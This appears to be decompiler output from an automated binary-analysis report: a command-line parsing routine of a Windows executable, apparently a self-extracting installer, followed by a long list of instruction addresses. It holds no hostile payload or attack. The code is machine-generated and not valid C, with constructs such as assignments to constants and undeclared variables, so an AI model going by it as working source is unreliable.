                                                                                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                                                                                            			E00A45C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                            				CHAR* _v265;
                                                                                                                                                                                                                                            				char _v266;
                                                                                                                                                                                                                                            				char _v267;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				CHAR* _v272;
                                                                                                                                                                                                                                            				char _v276;
                                                                                                                                                                                                                                            				signed int _v296;
                                                                                                                                                                                                                                            				char _v556;
                                                                                                                                                                                                                                            				signed int _t61;
                                                                                                                                                                                                                                            				int _t63;
                                                                                                                                                                                                                                            				char _t67;
                                                                                                                                                                                                                                            				CHAR* _t69;
                                                                                                                                                                                                                                            				signed int _t71;
                                                                                                                                                                                                                                            				void* _t75;
                                                                                                                                                                                                                                            				char _t79;
                                                                                                                                                                                                                                            				void* _t83;
                                                                                                                                                                                                                                            				void* _t85;
                                                                                                                                                                                                                                            				void* _t87;
                                                                                                                                                                                                                                            				intOrPtr _t88;
                                                                                                                                                                                                                                            				void* _t100;
                                                                                                                                                                                                                                            				intOrPtr _t101;
                                                                                                                                                                                                                                            				CHAR* _t104;
                                                                                                                                                                                                                                            				intOrPtr _t105;
                                                                                                                                                                                                                                            				void* _t111;
                                                                                                                                                                                                                                            				void* _t115;
                                                                                                                                                                                                                                            				CHAR* _t118;
                                                                                                                                                                                                                                            				void* _t119;
                                                                                                                                                                                                                                            				void* _t127;
                                                                                                                                                                                                                                            				CHAR* _t129;
                                                                                                                                                                                                                                            				void* _t132;
                                                                                                                                                                                                                                            				void* _t142;
                                                                                                                                                                                                                                            				signed int _t143;
                                                                                                                                                                                                                                            				CHAR* _t144;
                                                                                                                                                                                                                                            				void* _t145;
                                                                                                                                                                                                                                            				void* _t146;
                                                                                                                                                                                                                                            				void* _t147;
                                                                                                                                                                                                                                            				void* _t149;
                                                                                                                                                                                                                                            				char _t155;
                                                                                                                                                                                                                                            				void* _t157;
                                                                                                                                                                                                                                            				void* _t162;
                                                                                                                                                                                                                                            				void* _t163;
                                                                                                                                                                                                                                            				char _t167;
                                                                                                                                                                                                                                            				char _t170;
                                                                                                                                                                                                                                            				CHAR* _t173;
                                                                                                                                                                                                                                            				void* _t177;
                                                                                                                                                                                                                                            				intOrPtr* _t183;
                                                                                                                                                                                                                                            				intOrPtr* _t192;
                                                                                                                                                                                                                                            				CHAR* _t199;
                                                                                                                                                                                                                                            				void* _t200;
                                                                                                                                                                                                                                            				CHAR* _t201;
                                                                                                                                                                                                                                            				void* _t205;
                                                                                                                                                                                                                                            				void* _t206;
                                                                                                                                                                                                                                            				int _t209;
                                                                                                                                                                                                                                            				void* _t210;
                                                                                                                                                                                                                                            				void* _t212;
                                                                                                                                                                                                                                            				void* _t213;
                                                                                                                                                                                                                                            				CHAR* _t218;
                                                                                                                                                                                                                                            				intOrPtr* _t219;
                                                                                                                                                                                                                                            				intOrPtr* _t220;
                                                                                                                                                                                                                                            				signed int _t221;
                                                                                                                                                                                                                                            				signed int _t223;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t173 = __ecx;
                                                                                                                                                                                                                                            				_t61 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_v8 = _t61 ^ _t221;
                                                                                                                                                                                                                                            				_push(__ebx);
                                                                                                                                                                                                                                            				_push(__esi);
                                                                                                                                                                                                                                            				_push(__edi);
                                                                                                                                                                                                                                            				_t209 = 1;
                                                                                                                                                                                                                                            				if(__ecx == 0 ||  *__ecx == 0) {
                                                                                                                                                                                                                                            					_t63 = 1;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                                            					while(_t209 != 0) {
                                                                                                                                                                                                                                            						_t67 =  *_t173;
                                                                                                                                                                                                                                            						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                                                                                                                                                                                            							_t173 = CharNextA(_t173);
                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_v272 = _t173;
                                                                                                                                                                                                                                            						if(_t67 == 0) {
                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t69 = _v272;
                                                                                                                                                                                                                                            							_t177 = 0;
                                                                                                                                                                                                                                            							_t213 = 0;
                                                                                                                                                                                                                                            							_t163 = 0;
                                                                                                                                                                                                                                            							_t202 = 1;
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								if(_t213 != 0) {
                                                                                                                                                                                                                                            									if(_t163 != 0) {
                                                                                                                                                                                                                                            										break;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										goto L21;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t69 =  *_t69;
                                                                                                                                                                                                                                            									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                                                                                                                                                                                            										break;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t69 = _v272;
                                                                                                                                                                                                                                            										L21:
                                                                                                                                                                                                                                            										_t155 =  *_t69;
                                                                                                                                                                                                                                            										if(_t155 != 0x22) {
                                                                                                                                                                                                                                            											if(_t202 >= 0x104) {
                                                                                                                                                                                                                                            												goto L106;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                                                                                                                                                                                            												_t177 = _t177 + 1;
                                                                                                                                                                                                                                            												_t202 = _t202 + 1;
                                                                                                                                                                                                                                            												_t157 = 1;
                                                                                                                                                                                                                                            												goto L30;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											if(_v272[1] == 0x22) {
                                                                                                                                                                                                                                            												if(_t202 >= 0x104) {
                                                                                                                                                                                                                                            													L106:
                                                                                                                                                                                                                                            													_t63 = 0;
                                                                                                                                                                                                                                            													L125:
                                                                                                                                                                                                                                            													_pop(_t210);
                                                                                                                                                                                                                                            													_pop(_t212);
                                                                                                                                                                                                                                            													_pop(_t162);
                                                                                                                                                                                                                                            													return E00A46CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                                                                                                                                                                                            													_t177 = _t177 + 1;
                                                                                                                                                                                                                                            													_t202 = _t202 + 1;
                                                                                                                                                                                                                                            													_t157 = 2;
                                                                                                                                                                                                                                            													goto L30;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												_t157 = 1;
                                                                                                                                                                                                                                            												if(_t213 != 0) {
                                                                                                                                                                                                                                            													_t163 = 1;
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													_t213 = 1;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												goto L30;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L131;
                                                                                                                                                                                                                                            								L30:
                                                                                                                                                                                                                                            								_v272 =  &(_v272[_t157]);
                                                                                                                                                                                                                                            								_t69 = _v272;
                                                                                                                                                                                                                                            							} while ( *_t69 != 0);
                                                                                                                                                                                                                                            							if(_t177 >= 0x104) {
                                                                                                                                                                                                                                            								E00A46E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                                                                                                                                                                                            								asm("int3");
                                                                                                                                                                                                                                            								_push(_t221);
                                                                                                                                                                                                                                            								_t222 = _t223;
                                                                                                                                                                                                                                            								_t71 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            								_v296 = _t71 ^ _t223;
                                                                                                                                                                                                                                            								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                                                                                                                                                                                            									0x4f0 = 2;
                                                                                                                                                                                                                                            									_t75 = E00A4597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									E00A444B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                                                                                                                                                                                            									 *0xa49124 = E00A46285();
                                                                                                                                                                                                                                            									_t75 = 0;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								return E00A46CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                                                                                                                                                                                            								if(_t213 == 0) {
                                                                                                                                                                                                                                            									if(_t163 != 0) {
                                                                                                                                                                                                                                            										goto L34;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										goto L40;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									if(_t163 != 0) {
                                                                                                                                                                                                                                            										L40:
                                                                                                                                                                                                                                            										_t79 = _v268;
                                                                                                                                                                                                                                            										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                                                                                                                                                                                            											_t83 = CharUpperA(_v267) - 0x3f;
                                                                                                                                                                                                                                            											if(_t83 == 0) {
                                                                                                                                                                                                                                            												_t202 = 0x521;
                                                                                                                                                                                                                                            												E00A444B9(0, 0x521, 0xa41140, 0, 0x40, 0);
                                                                                                                                                                                                                                            												_t85 =  *0xa48588; // 0x0
                                                                                                                                                                                                                                            												if(_t85 != 0) {
                                                                                                                                                                                                                                            													CloseHandle(_t85);
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												ExitProcess(0);
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t87 = _t83 - 4;
                                                                                                                                                                                                                                            											if(_t87 == 0) {
                                                                                                                                                                                                                                            												if(_v266 != 0) {
                                                                                                                                                                                                                                            													if(_v266 != 0x3a) {
                                                                                                                                                                                                                                            														goto L49;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                                                            														_t215 =  &_v268 + _t167;
                                                                                                                                                                                                                                            														_t183 =  &_v268 + _t167;
                                                                                                                                                                                                                                            														_t50 = _t183 + 1; // 0x1
                                                                                                                                                                                                                                            														_t202 = _t50;
                                                                                                                                                                                                                                            														do {
                                                                                                                                                                                                                                            															_t88 =  *_t183;
                                                                                                                                                                                                                                            															_t183 = _t183 + 1;
                                                                                                                                                                                                                                            														} while (_t88 != 0);
                                                                                                                                                                                                                                            														if(_t183 == _t202) {
                                                                                                                                                                                                                                            															goto L49;
                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                            															_t205 = 0x5b;
                                                                                                                                                                                                                                            															if(E00A4667F(_t215, _t205) == 0) {
                                                                                                                                                                                                                                            																L115:
                                                                                                                                                                                                                                            																_t206 = 0x5d;
                                                                                                                                                                                                                                            																if(E00A4667F(_t215, _t206) == 0) {
                                                                                                                                                                                                                                            																	L117:
                                                                                                                                                                                                                                            																	_t202 =  &_v276;
                                                                                                                                                                                                                                            																	_v276 = _t167;
                                                                                                                                                                                                                                            																	if(E00A45C17(_t215,  &_v276) == 0) {
                                                                                                                                                                                                                                            																		goto L49;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		_t202 = 0x104;
                                                                                                                                                                                                                                            																		E00A41680(0xa48c42, 0x104, _v276 + _t167 +  &_v268);
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	_t202 = 0x5b;
                                                                                                                                                                                                                                            																	if(E00A4667F(_t215, _t202) == 0) {
                                                                                                                                                                                                                                            																		goto L49;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		goto L117;
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																_t202 = 0x5d;
                                                                                                                                                                                                                                            																if(E00A4667F(_t215, _t202) == 0) {
                                                                                                                                                                                                                                            																	goto L49;
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	goto L115;
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													 *0xa48a24 = 1;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												goto L50;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												_t100 = _t87 - 1;
                                                                                                                                                                                                                                            												if(_t100 == 0) {
                                                                                                                                                                                                                                            													L98:
                                                                                                                                                                                                                                            													if(_v266 != 0x3a) {
                                                                                                                                                                                                                                            														goto L49;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                                                            														_t217 =  &_v268 + _t170;
                                                                                                                                                                                                                                            														_t192 =  &_v268 + _t170;
                                                                                                                                                                                                                                            														_t38 = _t192 + 1; // 0x1
                                                                                                                                                                                                                                            														_t202 = _t38;
                                                                                                                                                                                                                                            														do {
                                                                                                                                                                                                                                            															_t101 =  *_t192;
                                                                                                                                                                                                                                            															_t192 = _t192 + 1;
                                                                                                                                                                                                                                            														} while (_t101 != 0);
                                                                                                                                                                                                                                            														if(_t192 == _t202) {
                                                                                                                                                                                                                                            															goto L49;
                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                            															_t202 =  &_v276;
                                                                                                                                                                                                                                            															_v276 = _t170;
                                                                                                                                                                                                                                            															if(E00A45C17(_t217,  &_v276) == 0) {
                                                                                                                                                                                                                                            																goto L49;
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																_t104 = CharUpperA(_v267);
                                                                                                                                                                                                                                            																_t218 = 0xa48b3e;
                                                                                                                                                                                                                                            																_t105 = _v276;
                                                                                                                                                                                                                                            																if(_t104 != 0x54) {
                                                                                                                                                                                                                                            																	_t218 = 0xa48a3a;
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            																E00A41680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                                                                                                                                                                                                            																_t202 = 0x104;
                                                                                                                                                                                                                                            																E00A4658A(_t218, 0x104, 0xa41140);
                                                                                                                                                                                                                                            																if(E00A431E0(_t218) != 0) {
                                                                                                                                                                                                                                            																	goto L50;
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	goto L106;
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													_t111 = _t100 - 0xa;
                                                                                                                                                                                                                                            													if(_t111 == 0) {
                                                                                                                                                                                                                                            														if(_v266 != 0) {
                                                                                                                                                                                                                                            															if(_v266 != 0x3a) {
                                                                                                                                                                                                                                            																goto L49;
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																_t199 = _v265;
                                                                                                                                                                                                                                            																if(_t199 != 0) {
                                                                                                                                                                                                                                            																	_t219 =  &_v265;
                                                                                                                                                                                                                                            																	do {
                                                                                                                                                                                                                                            																		_t219 = _t219 + 1;
                                                                                                                                                                                                                                            																		_t115 = CharUpperA(_t199) - 0x45;
                                                                                                                                                                                                                                            																		if(_t115 == 0) {
                                                                                                                                                                                                                                            																			 *0xa48a2c = 1;
                                                                                                                                                                                                                                            																		} else {
                                                                                                                                                                                                                                            																			_t200 = 2;
                                                                                                                                                                                                                                            																			_t119 = _t115 - _t200;
                                                                                                                                                                                                                                            																			if(_t119 == 0) {
                                                                                                                                                                                                                                            																				 *0xa48a30 = 1;
                                                                                                                                                                                                                                            																			} else {
                                                                                                                                                                                                                                            																				if(_t119 == 0xf) {
                                                                                                                                                                                                                                            																					 *0xa48a34 = 1;
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t209 = 0;
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																			}
                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                            																		_t118 =  *_t219;
                                                                                                                                                                                                                                            																		_t199 = _t118;
                                                                                                                                                                                                                                            																	} while (_t118 != 0);
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                            															 *0xa48a2c = 1;
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            														goto L50;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														_t127 = _t111 - 3;
                                                                                                                                                                                                                                            														if(_t127 == 0) {
                                                                                                                                                                                                                                            															if(_v266 != 0) {
                                                                                                                                                                                                                                            																if(_v266 != 0x3a) {
                                                                                                                                                                                                                                            																	goto L49;
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	_t129 = CharUpperA(_v265);
                                                                                                                                                                                                                                            																	if(_t129 == 0x31) {
                                                                                                                                                                                                                                            																		goto L76;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		if(_t129 == 0x41) {
                                                                                                                                                                                                                                            																			goto L83;
                                                                                                                                                                                                                                            																		} else {
                                                                                                                                                                                                                                            																			if(_t129 == 0x55) {
                                                                                                                                                                                                                                            																				goto L76;
                                                                                                                                                                                                                                            																			} else {
                                                                                                                                                                                                                                            																				goto L49;
                                                                                                                                                                                                                                            																			}
                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																L76:
                                                                                                                                                                                                                                            																_push(2);
                                                                                                                                                                                                                                            																_pop(1);
                                                                                                                                                                                                                                            																L83:
                                                                                                                                                                                                                                            																 *0xa48a38 = 1;
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            															goto L50;
                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                            															_t132 = _t127 - 1;
                                                                                                                                                                                                                                            															if(_t132 == 0) {
                                                                                                                                                                                                                                            																if(_v266 != 0) {
                                                                                                                                                                                                                                            																	if(_v266 != 0x3a) {
                                                                                                                                                                                                                                            																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                                                                                                                                                                                            																			goto L49;
                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		_t201 = _v265;
                                                                                                                                                                                                                                            																		 *0xa49a2c = 1;
                                                                                                                                                                                                                                            																		if(_t201 != 0) {
                                                                                                                                                                                                                                            																			_t220 =  &_v265;
                                                                                                                                                                                                                                            																			do {
                                                                                                                                                                                                                                            																				_t220 = _t220 + 1;
                                                                                                                                                                                                                                            																				_t142 = CharUpperA(_t201) - 0x41;
                                                                                                                                                                                                                                            																				if(_t142 == 0) {
                                                                                                                                                                                                                                            																					_t143 = 2;
                                                                                                                                                                                                                                            																					 *0xa49a2c =  *0xa49a2c | _t143;
                                                                                                                                                                                                                                            																					goto L70;
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t145 = _t142 - 3;
                                                                                                                                                                                                                                            																					if(_t145 == 0) {
                                                                                                                                                                                                                                            																						 *0xa48d48 =  *0xa48d48 | 0x00000040;
                                                                                                                                                                                                                                            																					} else {
                                                                                                                                                                                                                                            																						_t146 = _t145 - 5;
                                                                                                                                                                                                                                            																						if(_t146 == 0) {
                                                                                                                                                                                                                                            																							 *0xa49a2c =  *0xa49a2c & 0xfffffffd;
                                                                                                                                                                                                                                            																							goto L70;
                                                                                                                                                                                                                                            																						} else {
                                                                                                                                                                                                                                            																							_t147 = _t146 - 5;
                                                                                                                                                                                                                                            																							if(_t147 == 0) {
                                                                                                                                                                                                                                            																								 *0xa49a2c =  *0xa49a2c & 0xfffffffe;
                                                                                                                                                                                                                                            																								goto L70;
                                                                                                                                                                                                                                            																							} else {
                                                                                                                                                                                                                                            																								_t149 = _t147;
                                                                                                                                                                                                                                            																								if(_t149 == 0) {
                                                                                                                                                                                                                                            																									 *0xa48d48 =  *0xa48d48 | 0x00000080;
                                                                                                                                                                                                                                            																								} else {
                                                                                                                                                                                                                                            																									if(_t149 == 3) {
                                                                                                                                                                                                                                            																										 *0xa49a2c =  *0xa49a2c | 0x00000004;
                                                                                                                                                                                                                                            																										L70:
                                                                                                                                                                                                                                            																										 *0xa48a28 = 1;
                                                                                                                                                                                                                                            																									} else {
                                                                                                                                                                                                                                            																										_t209 = 0;
                                                                                                                                                                                                                                            																									}
                                                                                                                                                                                                                                            																								}
                                                                                                                                                                                                                                            																							}
                                                                                                                                                                                                                                            																						}
                                                                                                                                                                                                                                            																					}
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																				_t144 =  *_t220;
                                                                                                                                                                                                                                            																				_t201 = _t144;
                                                                                                                                                                                                                                            																			} while (_t144 != 0);
                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	 *0xa49a2c = 3;
                                                                                                                                                                                                                                            																	 *0xa48a28 = 1;
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            																goto L50;
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																if(_t132 == 0) {
                                                                                                                                                                                                                                            																	goto L98;
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	L49:
                                                                                                                                                                                                                                            																	_t209 = 0;
                                                                                                                                                                                                                                            																	L50:
                                                                                                                                                                                                                                            																	_t173 = _v272;
                                                                                                                                                                                                                                            																	if( *_t173 != 0) {
                                                                                                                                                                                                                                            																		goto L2;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		break;
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											goto L106;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										L34:
                                                                                                                                                                                                                                            										_t209 = 0;
                                                                                                                                                                                                                                            										break;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						goto L131;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if( *0xa48a2c != 0 &&  *0xa48b3e == 0) {
                                                                                                                                                                                                                                            						if(GetModuleFileNameA( *0xa49a3c, 0xa48b3e, 0x104) == 0) {
                                                                                                                                                                                                                                            							_t209 = 0;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t202 = 0x5c;
                                                                                                                                                                                                                                            							 *((char*)(E00A466C8(0xa48b3e, _t202) + 1)) = 0;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t63 = _t209;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				L131:
                                                                                                                                                                                                                                            			}


































































                                                                                                                                                                                                                                            0x00a45c9e
                                                                                                                                                                                                                                            0x00a45ca9
                                                                                                                                                                                                                                            0x00a45cb0
                                                                                                                                                                                                                                            0x00a45cb3
                                                                                                                                                                                                                                            0x00a45cb6
                                                                                                                                                                                                                                            0x00a45cb7
                                                                                                                                                                                                                                            0x00a45cb8
                                                                                                                                                                                                                                            0x00a45cbd
                                                                                                                                                                                                                                            0x00a46204
                                                                                                                                                                                                                                            0x00a45ccb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45ccb
                                                                                                                                                                                                                                            0x00a45cd3
                                                                                                                                                                                                                                            0x00a45cd7
                                                                                                                                                                                                                                            0x00a45cf4
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45cf4
                                                                                                                                                                                                                                            0x00a45cf8
                                                                                                                                                                                                                                            0x00a45d00
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45d06
                                                                                                                                                                                                                                            0x00a45d06
                                                                                                                                                                                                                                            0x00a45d0e
                                                                                                                                                                                                                                            0x00a45d10
                                                                                                                                                                                                                                            0x00a45d12
                                                                                                                                                                                                                                            0x00a45d14
                                                                                                                                                                                                                                            0x00a45d15
                                                                                                                                                                                                                                            0x00a45d17
                                                                                                                                                                                                                                            0x00a45d49
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45d19
                                                                                                                                                                                                                                            0x00a45d19
                                                                                                                                                                                                                                            0x00a45d1d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45d3f
                                                                                                                                                                                                                                            0x00a45d3f
                                                                                                                                                                                                                                            0x00a45d4b
                                                                                                                                                                                                                                            0x00a45d4b
                                                                                                                                                                                                                                            0x00a45d4f
                                                                                                                                                                                                                                            0x00a45d8d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45d93
                                                                                                                                                                                                                                            0x00a45d93
                                                                                                                                                                                                                                            0x00a45d9a
                                                                                                                                                                                                                                            0x00a45d9d
                                                                                                                                                                                                                                            0x00a45d9e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45d9e
                                                                                                                                                                                                                                            0x00a45d51
                                                                                                                                                                                                                                            0x00a45d5b
                                                                                                                                                                                                                                            0x00a45d72
                                                                                                                                                                                                                                            0x00a460fb
                                                                                                                                                                                                                                            0x00a460fb
                                                                                                                                                                                                                                            0x00a46207
                                                                                                                                                                                                                                            0x00a4620a
                                                                                                                                                                                                                                            0x00a4620b
                                                                                                                                                                                                                                            0x00a4620e
                                                                                                                                                                                                                                            0x00a46217
                                                                                                                                                                                                                                            0x00a45d78
                                                                                                                                                                                                                                            0x00a45d78
                                                                                                                                                                                                                                            0x00a45d80
                                                                                                                                                                                                                                            0x00a45d83
                                                                                                                                                                                                                                            0x00a45d84
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45d84
                                                                                                                                                                                                                                            0x00a45d5d
                                                                                                                                                                                                                                            0x00a45d5f
                                                                                                                                                                                                                                            0x00a45d62
                                                                                                                                                                                                                                            0x00a45d68
                                                                                                                                                                                                                                            0x00a45d64
                                                                                                                                                                                                                                            0x00a45d64
                                                                                                                                                                                                                                            0x00a45d64
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45d62
                                                                                                                                                                                                                                            0x00a45d5b
                                                                                                                                                                                                                                            0x00a45d4f
                                                                                                                                                                                                                                            0x00a45d1d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45d9f
                                                                                                                                                                                                                                            0x00a45d9f
                                                                                                                                                                                                                                            0x00a45da5
                                                                                                                                                                                                                                            0x00a45dab
                                                                                                                                                                                                                                            0x00a45dba
                                                                                                                                                                                                                                            0x00a46218
                                                                                                                                                                                                                                            0x00a4621d
                                                                                                                                                                                                                                            0x00a46220
                                                                                                                                                                                                                                            0x00a46221
                                                                                                                                                                                                                                            0x00a46229
                                                                                                                                                                                                                                            0x00a46230
                                                                                                                                                                                                                                            0x00a46247
                                                                                                                                                                                                                                            0x00a4626a
                                                                                                                                                                                                                                            0x00a46272
                                                                                                                                                                                                                                            0x00a46249
                                                                                                                                                                                                                                            0x00a46255
                                                                                                                                                                                                                                            0x00a4625f
                                                                                                                                                                                                                                            0x00a46264
                                                                                                                                                                                                                                            0x00a46264
                                                                                                                                                                                                                                            0x00a46284
                                                                                                                                                                                                                                            0x00a45dc0
                                                                                                                                                                                                                                            0x00a45dc0
                                                                                                                                                                                                                                            0x00a45dca
                                                                                                                                                                                                                                            0x00a45e22
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45dcc
                                                                                                                                                                                                                                            0x00a45dce
                                                                                                                                                                                                                                            0x00a45e24
                                                                                                                                                                                                                                            0x00a45e24
                                                                                                                                                                                                                                            0x00a45e2c
                                                                                                                                                                                                                                            0x00a45e47
                                                                                                                                                                                                                                            0x00a45e4a
                                                                                                                                                                                                                                            0x00a461d2
                                                                                                                                                                                                                                            0x00a461e2
                                                                                                                                                                                                                                            0x00a461e7
                                                                                                                                                                                                                                            0x00a461ee
                                                                                                                                                                                                                                            0x00a461f1
                                                                                                                                                                                                                                            0x00a461f1
                                                                                                                                                                                                                                            0x00a461f8
                                                                                                                                                                                                                                            0x00a461f8
                                                                                                                                                                                                                                            0x00a45e50
                                                                                                                                                                                                                                            0x00a45e53
                                                                                                                                                                                                                                            0x00a46109
                                                                                                                                                                                                                                            0x00a4611f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a46125
                                                                                                                                                                                                                                            0x00a46137
                                                                                                                                                                                                                                            0x00a4613a
